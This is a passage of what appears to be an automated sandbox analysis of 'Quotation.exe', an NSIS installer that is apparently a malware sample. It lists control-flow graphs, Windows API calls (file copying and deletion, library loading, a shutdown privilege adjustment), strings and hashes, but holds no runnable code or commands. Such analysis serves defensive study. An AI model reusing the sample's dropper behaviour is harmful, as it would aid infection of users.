lstrcpynW 3236->3271 3237->3012 3237->3013 3239 406761 3240 406779 3239->3240 3241 40676b lstrcatW 3239->3241 3244 406cee 2 API calls 3240->3244 3243 40677f 3241->3243 3242 4065ad 2 API calls 3245 406876 3242->3245 3246 406790 lstrcatW 3243->3246 3249 406798 lstrlenW FindFirstFileW 3243->3249 3244->3243 3245->3237 3247 40687a 3245->3247 3246->3249 3248 406534 3 API calls 3247->3248 3251 406880 3248->3251 3249->3250 3258 4067c1 3249->3258 3250->3237 3250->3242 3252 406563 5 API calls 3251->3252 3253 40688c 3252->3253 3255 406890 3253->3255 3256 4068af 3253->3256 3254 40683b FindNextFileW 3254->3258 3259 406852 FindClose 3254->3259 3255->3237 3261 405d18 24 API calls 3255->3261 3260 405d18 24 API calls 3256->3260 3258->3254 3265 4066f7 59 API calls 3258->3265 3267 406807 3258->3267 3272 406af8 lstrcpynW 3258->3272 3259->3250 3260->3237 3262 40689c 3261->3262 3264 40621b 35 API calls 3262->3264 3266 4068a5 3264->3266 3265->3267 3266->3237 3267->3254 3268 405d18 24 API calls 3267->3268 3269 405d18 24 API calls 3267->3269 3270 40621b 35 API calls 3267->3270 3273 406563 3267->3273 3268->3254 3269->3267 3270->3267 3271->3239 3272->3258 3274 406b7b 2 API calls 3273->3274 3275 40656f 3274->3275 3276 406591 3275->3276 3277 406587 DeleteFileW 3275->3277 3278 40657f RemoveDirectoryW 3275->3278 3276->3267 3279 40658d 3277->3279 3278->3279 3279->3276 3280 40659c SetFileAttributesW 3279->3280 3280->3276 3372 70022ebf 3373 70022ed7 3372->3373 3374 70021309 2 API calls 3373->3374 3375 70022ef2 3374->3375

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 0 4036da-403723 SetErrorMode GetVersionExW 1 403725-403745 GetVersionExW 0->1 2 40375c 0->2 3 403747-40374b 1->3 4 403758-40375a 1->4 5 403763-403768 2->5 6 40374e-403756 3->6 4->6 7 403775 5->7 8 40376a-403773 5->8 6->5 9 403779-4037bb 7->9 8->9 10 4037bd-4037c5 call 4068c4 9->10 11 4037ce 9->11 10->11 16 4037c7 10->16 13 4037d3-4037e5 call 40617c lstrlenA 11->13 18 4037e7-403803 call 4068c4 * 3 13->18 16->11 25 403814-4038ad #17 OleInitialize SHGetFileInfoW call 406af8 GetCommandLineW call 406af8 call 4065d4 CharNextW 18->25 26 403805-40380b 18->26 35 4038b3 25->35 36 403988-4039a2 GetTempPathW call 403c83 25->36 26->25 30 40380d 26->30 30->25 38 4038b5-4038bb 35->38 42 4039a4-4039c2 GetWindowsDirectoryW lstrcatW call 403c83 36->42 43 4039fa-403a13 DeleteFileW call 4033cb 36->43 40 4038c8-4038d3 38->40 41 4038bd-4038c6 38->41 44 4038d5-4038dc 40->44 45 4038de-4038ed 40->45 41->40 41->41 42->43 59 4039c4-4039f4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c83 42->59 61 403bc4 43->61 62 403a19-403a1f 43->62 44->45 46 403948-40395c call 4065d4 45->46 47 4038ef-4038fb 45->47 69 403964-40396a 46->69 70 40395e-403961 46->70 50 403915-40391b 47->50 51 4038fd-403904 47->51 57 403937-40393e 50->57 58 40391d-403924 50->58 55 403906-403909 51->55 56 40390b 51->56 55->50 55->56 56->50 57->46 67 403940-403946 57->67 58->57 65 403926-40392d 58->65 59->43 83 403bc2 59->83 66 403bc8-403bd5 call 4036b0 OleUninitialize 61->66 63 403a21-403a33 call 4065d4 62->63 64 403a84-403a8b call 405a1c 62->64 84 403a49-403a4b 63->84 80 403a90-403a92 64->80 74 403934 65->74 75 40392f-403932 65->75 85 403bd7-403be2 call 406a86 66->85 86 403bea-403bf1 66->86 67->46 77 403974-403983 call 406af8 67->77 69->36 71 40396c-40396f 69->71 70->69 71->38 74->57 75->57 75->74 77->36 80->66 83->61 87 403a35-403a3b 84->87 88 403a4d-403a54 84->88 96 403be4 ExitProcess 85->96 90 403bf3-403c09 GetCurrentProcess OpenProcessToken 86->90 91 403c6f-403c7e 86->91 92 403a46 87->92 93 403a3d-403a44 87->93 94 403a56-403a66 call 406616 88->94 95 403a97-403aaf call 4064da lstrcatW 88->95 98 403c0b-403c39 LookupPrivilegeValueW AdjustTokenPrivileges 90->98 99 403c3f-403c4d call 4068c4 90->99 91->96 92->84 93->88 93->92 110 403a6c-403a82 call 406af8 * 2 94->110 111 403bbe-403bc0 94->111 108 403ac0-403ae1 lstrcatW lstrcmpiW 95->108 109 403ab1-403abb lstrcatW 95->109 98->99 106 403c5b-403c66 ExitWindowsEx 99->106 107 403c4f-403c59 99->107 106->91 112 403c68-403c6a call 401533 106->112 107->106 107->112 108->111 113 403ae7-403aee 108->113 109->108 110->64 111->66 112->91 117 403af0-403af5 call 405e1c 113->117 118 403af7 call 405dfc 113->118 124 403afc-403b0e SetCurrentDirectoryW 117->124 118->124 126 403b10-403b1a call 406af8 124->126 127 403b1f-403b39 call 406af8 124->127 126->127 131 403b3a-403b58 call 405e98 DeleteFileW 127->131 134 403ba7-403bb1 131->134 135 403b5a-403b6e CopyFileW 131->135 134->131 136 403bb3-403bb9 call 40621b 134->136 135->134 137 403b70-403b95 call 40621b call 405e98 call 4066b4 135->137 136->111 144 403b9a-403b9c 137->144 144->134 145 403b9e-403ba5 CloseHandle 144->145 145->134
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008001), ref: 004036F6
                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                    • GetVersionExW.KERNEL32(?), ref: 00403732
                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
                                                                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
                                                                                    • OleInitialize.OLE32(00000000), ref: 0040381B
                                                                                    • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
                                                                                    • GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
                                                                                    • CharNextW.USER32(00000000,007B3000,?,007B3000,00000000), ref: 0040389B
                                                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
                                                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
                                                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
                                                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403A05
                                                                                      • Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
                                                                                      • Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AA8
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ABB
                                                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ACA
                                                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AD9
                                                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
                                                                                    • DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
                                                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,0079F200,?), ref: 00403B66
                                                                                    • CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F
                                                                                      • Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                                      • Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E
                                                                                    • OleUninitialize.OLE32(00000000), ref: 00403BCD
                                                                                    • ExitProcess.KERNEL32 ref: 00403BE4
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E
                                                                                      • Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,007B3000,?,007B3000,00000000), ref: 004065EA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                                    • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\overlays\besvangredes\unnaturalism$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                    • API String ID: 1152188737-1512374475
                                                                                    • Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                    • Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
                                                                                    • Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                                    • Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 329 40154a-4015bd 330 402ea1 329->330 331 4015c3-4015c7 329->331 351 402ea5 330->351 332 4016c1-4016cf 331->332 333 4017c2-401e9e call 40303e call 4065ad 331->333 334 401684-4016aa 331->334 335 4015e6-4015ee 331->335 336 4018cb-4018d4 call 40303e call 406a34 331->336 337 40160c-40160d 331->337 338 4015ce-4015d0 331->338 339 4016ef-4016fb call 40303e SetFileAttributesW 331->339 340 4016af-4016bc call 4065fd 331->340 341 40182f-40184b call 40303e GetFullPathNameW 331->341 342 401711-401728 call 40303e call 406ba3 331->342 343 401633-40163a SetForegroundWindow 331->343 344 4017d3-4017f6 call 40303e * 3 MoveFileW 331->344 345 4015d5-4015d6 331->345 346 401618-40162e call 403002 Sleep 331->346 347 4015f9-401607 call 4030fd call 401399 331->347 348 40189b-4018b8 call 40303e SearchPathW 331->348 349 4018de-401904 call 40303e call 406de1 331->349 350 40163f-401645 331->350 369 4016d1-4016d5 ShowWindow 332->369 370 4016d9-4016e0 332->370 422 401bb2-401bb6 333->422 423 401ea4-401ea8 333->423 366 402ead-402eb7 334->366 352 4015f0-4015f7 PostQuitMessage 335->352 353 4015dc-4015e1 335->353 406 4018d9 336->406 358 40160e-401613 call 405d18 337->358 338->366 389 401701-401703 339->389 340->330 399 401857-40185d 341->399 400 40184d-401855 341->400 414 401784-40178e 342->414 415 40172a-40173f call 4065d4 342->415 343->330 430 401804-401808 344->430 431 4017f8-4017ff 344->431 371 4015d7 call 405d18 345->371 346->330 347->366 348->330 393 4018be-4018c6 348->393 417 401906-40190c call 406af8 349->417 418 40190e-401920 call 406af8 call 406534 lstrcatW 349->418 363 401671-40167f 350->363 364 401647 350->364 365 402eab 351->365 352->353 353->366 358->330 363->330 382 401657-40166c call 403002 364->382 383 401649-401650 364->383 365->366 369->370 370->330 386 4016e6-4016ea ShowWindow 370->386 371->353 382->330 383->382 386->330 389->330 401 401709-40170c 389->401 393->351 410 40187b 399->410 411 40185f-401862 399->411 409 40187f-401883 400->409 401->351 406->389 409->351 412 401889-401896 GetShortPathNameW 409->412 410->409 411->410 419 401864-40186c call 4065ad 411->419 412->351 426 401790-4017ab call 405d18 call 406af8 SetCurrentDirectoryW 414->426 427 4017bb-4017bd 414->427 436 401741-401745 415->436 437 401758-401759 call 405dfc 415->437 439 401925-40192d call 406d1b 417->439 418->439 419->400 442 40186e-401876 call 406af8 419->442 422->366 423->366 426->330 460 4017b1-4017b6 426->460 427->358 430->401 438 40180e-401816 call 4065ad 430->438 431->358 436->437 443 401747-40174e call 4064da 436->443 452 40175e-401760 437->452 438->401 456 40181c-40182a call 40621b 438->456 459 40192e-401931 439->459 442->410 443->437 461 401750-401751 call 405e1c 443->461 457 401762-401767 452->457 458 401775-40177e 452->458 456->358 463 401774 457->463 464 401769-401772 GetFileAttributesW 457->464 458->415 465 401780 458->465 466 401933-40193d call 4065ad 459->466 467 401964-401966 459->467 460->330 475 401756 461->475 463->458 464->458 464->463 465->414 477 401950-401960 466->477 478 40193f-40194e CompareFileTime 466->478 468 401968-401969 call 406b7b 467->468 469 40196e-401989 call 4068f9 467->469 468->469 480 401a18-401a49 call 405d18 call 403148 469->480 481 40198f-401991 469->481 475->452 477->467 478->477 494 401a52-401a5a SetFileTime 480->494 495 401a4b-401a50 480->495 482 401993-4019df call 406af8 * 2 call 405e98 call 406af8 call 406a86 481->482 483 4019fd-401a13 call 405d18 481->483 482->459 512 4019e5-4019e8 482->512 483->351 496 401a60-401a6d CloseHandle 494->496 495->494 495->496 496->330 498 401a73-401a76 496->498 500 401a78-401a87 call 405e98 lstrcatW 498->500 501 401a89-401a8c call 405e98 498->501 507 401a91-401a9c call 406a86 500->507 501->507 507->353 513 4019f2-4019f8 512->513 514 4019ea-4019ed 512->514 513->365 514->371
                                                                                    APIs
                                                                                    • PostQuitMessage.USER32(00000000), ref: 004015F1
                                                                                    • Sleep.KERNELBASE(00000001,?,00000000,00000000), ref: 00401628
                                                                                    • SetForegroundWindow.USER32 ref: 00401634
                                                                                    • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                                                                    • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                                                                    • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                                                                    • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\overlays\besvangredes\unnaturalism,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,00000000,000000F0,?,?,00000000,00000000), ref: 004017A3
                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\overlays\besvangredes\unnaturalism,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\overlays\besvangredes\unnaturalism,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                                                                    • SetFileTime.KERNELBASE(?,?,00000000,?,?,?,00000000,00000000,000000EA,?,Call,40000000,00000001,Call,00000000,00000000), ref: 00401A5A
                                                                                    • CloseHandle.KERNELBASE(?,?,?,00000000,00000000), ref: 00401A61
                                                                                    • lstrcatW.KERNEL32(Call,?,Call,000000E9,?,?,00000000,00000000), ref: 00401A82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nss582A.tmp$C:\Users\user\AppData\Local\Temp\nss582A.tmp\System.dll$C:\Users\user\overlays\besvangredes\unnaturalism$Call
                                                                                    • API String ID: 3895412863-1929023778
                                                                                    • Opcode ID: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                    • Instruction ID: f97e61f8377ab9e25a0dd965f2557d34b91b3991d6c9f65f1b163fc05bb86adc
                                                                                    • Opcode Fuzzy Hash: 907391b652bc81e351481e76b091bf194ed4adcc93ce6230dc48087d29c5e171
                                                                                    • Instruction Fuzzy Hash: 6AD1D571644301ABC710BF66CD85E2B76A8AF86758F10463FF452B22E1DB7CD8019A6F
                                                                                    APIs
                                                                                      • Part of subcall function 700212F8: GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 7002294E
                                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 700229A4
                                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 700229AF
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 700229C0
                                                                                    • GlobalFree.KERNEL32(?), ref: 70022A44
                                                                                    • GlobalFree.KERNEL32(?), ref: 70022A4A
                                                                                    • GlobalFree.KERNEL32(?), ref: 70022A50
                                                                                    • GetModuleHandleW.KERNEL32(00000008), ref: 70022B1A
                                                                                    • LoadLibraryW.KERNEL32(00000008), ref: 70022B2B
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 70022B82
                                                                                    • lstrlenW.KERNEL32(00000808), ref: 70022B9D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1996808927.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1996786623.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996880927.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1996906021.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_70020000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1042148487-0
                                                                                    • Opcode ID: 01a9cc7be63b2bf7b2f5ee67372f57986f880b10be9e15ed611c1b68974d87a2
                                                                                    • Instruction ID: 2ba2e0282eae7e96d4a0a026fa72561c786d71a78ca349f4d4e9e090fa7addca
                                                                                    • Opcode Fuzzy Hash: 01a9cc7be63b2bf7b2f5ee67372f57986f880b10be9e15ed611c1b68974d87a2
                                                                                    • Instruction Fuzzy Hash: 5C42D471A08302AFD315CF74E44475EB7F6FF88B22F504A2EE49AD6254D770D9848B92

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 866 4066f7-406720 call 406616 869 406722-406734 DeleteFileW 866->869 870 406739-406743 866->870 871 4068b8-4068c1 869->871 872 406745-406747 870->872 873 406756-406769 call 406af8 870->873 874 4068a7-4068ad 872->874 875 40674d-406750 872->875 880 406779-40677a call 406cee 873->880 881 40676b-406777 lstrcatW 873->881 879 4068b7 874->879 875->873 877 406870-406878 call 4065ad 875->877 877->879 888 40687a-40688e call 406534 call 406563 877->888 879->871 883 40677f-406784 880->883 881->883 886 406790-406796 lstrcatW 883->886 887 406786-40678e 883->887 890 406798-4067bb lstrlenW FindFirstFileW 886->890 887->886 887->890 902 406890-406892 888->902 903 4068af-4068b2 call 405d18 888->903 891 4067c1-4067c3 890->891 892 406859-40685e 890->892 894 4067c4-4067c9 891->894 892->879 896 406860-40686e 892->896 897 4067e2-4067f5 call 406af8 894->897 898 4067cb-4067d1 894->898 896->874 896->877 911 4067f7-4067fe 897->911 912 406809-406812 call 406563 897->912 900 4067d3-4067d8 898->900 901 40683b-40684c FindNextFileW 898->901 900->897 905 4067da-4067e0 900->905 901->894 908 406852-406853 FindClose 901->908 902->874 906 406894-4068a5 call 405d18 call 40621b 902->906 903->879 905->897 905->901 906->879 908->892 911->901 914 406800-406802 call 4066f7 911->914 921 406833-406836 call 405d18 912->921 922 406814-406816 912->922 920 406807 914->920 920->901 921->901 923 406818-406829 call 405d18 call 40621b 922->923 924 40682b-406831 922->924 923->901 924->901
                                                                                    APIs
                                                                                      • Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                                      • Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                    • DeleteFileW.KERNELBASE(?,?,00000000,76F93420,?), ref: 00406723
                                                                                    • lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406775
                                                                                    • lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406796
                                                                                    • lstrlenW.KERNEL32(?), ref: 00406799
                                                                                    • FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
                                                                                    • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
                                                                                    • FindClose.KERNEL32(00000000), ref: 00406853
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1952731849.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2636146433-1173974218
                                                                                    • Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                    • Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
                                                                                    • Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                                    • Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                    • FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1950641214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1950628419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950654842.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1950669196.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
